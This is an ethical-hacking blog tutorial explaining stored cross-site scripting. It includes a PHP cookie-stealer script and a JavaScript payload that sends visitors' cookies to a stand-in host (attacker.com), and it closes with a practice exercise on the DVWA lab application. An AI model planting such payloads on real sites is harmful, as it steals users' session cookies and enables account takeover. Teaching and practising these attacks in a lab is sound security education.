DEVIL'S BLOG ON SECURITY

A DEVIL'S BLOG ON COMPUTER AND INFORMATION SECURITY, ETHICAL HACKING AND COUNTERMEASURES

Learn Ethical Hacking | Learn Hacking Online | Learn How To Hack|Hack Counter Hack| Ethical Hacking Tutorials

Home   ||   See All Tutorials  ||   Products  ||   About This Blog   ||  Subscribe To RSS Feed


Join facebook group THE HACKER DEVIL

Cross Site Scripting (XSS) | Performing Stored Attacks

Cross Site Scripting (XSS) | Performing Stored Attacks

In last post to cross site scripting we discussed about how to perform a reflected XSS attack. In this following post we will discus how to perform a stored XSS attack. A stored XSS attack is said to done when attacker uses XSS vulnerability of web application to store his/her submitted script in web application’s database and then it is displayed to other users without being filtered or sanitized. Stored XSS vulnerabilities are common in web application which supports interaction between several users for example, guest books, comment replies, question forms, response forms, review sections etc. If attacker manages to embed a Java script in such application then it can help him/her attack every user who will interact with his/her submitted data. Practically both attacks are performed in same way but on different type of web applications.

Let’s consider a real example suppose an attacker wants to steal user’s cookies from some abcxyz forum. So first of all he/she will prepare a cookie stealer, following PHP script is simple example of cookie stealer you can also create a cookie stealer with Java Script.
<?php
if(isset($_GET['cookie'])){
$cookie = $_GET['cookie'];
$fh = fopen("cookies.txt", "a");
fwrite($fh, $cookie);
}
?>
Now suppose he has hosted this script at www.attacker.com/stealer.php, where attaker.com is hacker’s website. Now while replying in a web application he/she will enter his/her name and also embed a Java Script which will call script every time when someone visits the thread or reply created by attacker. The java script might appear as follows,
<script>
document.write('<img style="display: none;" src="www.attacker.com/stealer.php?cookie='+document.cookie+'"/>');
</script>
To practice stored XSS attack on DVWA first set security level to low, then select “stored XSS attack”. Now in place of name type DEVIL and in message section type following lines,
Visit <acript>alert(‘Hi from DEVIL’)</script> <a href=“http://nrupentheking.blogspot.com”>DEVIL’S BLOG ON SECURITY</a>
After pressing submit button your message will be stored in DVWA, now post any other message you will find script embedded in your message with name DEVIL will execute every time whenever a new message is posted. Now refer cheat sheet and try higher security levels. Those who can understand coding should also have their look on code snippets.

If something was difficult to understand then please feel free to ask. Thanks for reading, have a nice time and keep visiting.
Posted by Nrupen Masram
Labels: , , , , ,

Free Ethical Hacking Training | Learn Ethical Hacking Online Free | Learn How To Hack | Hack Counter Hack | Ethical Hacking Tutorials | Devil's Blog On Security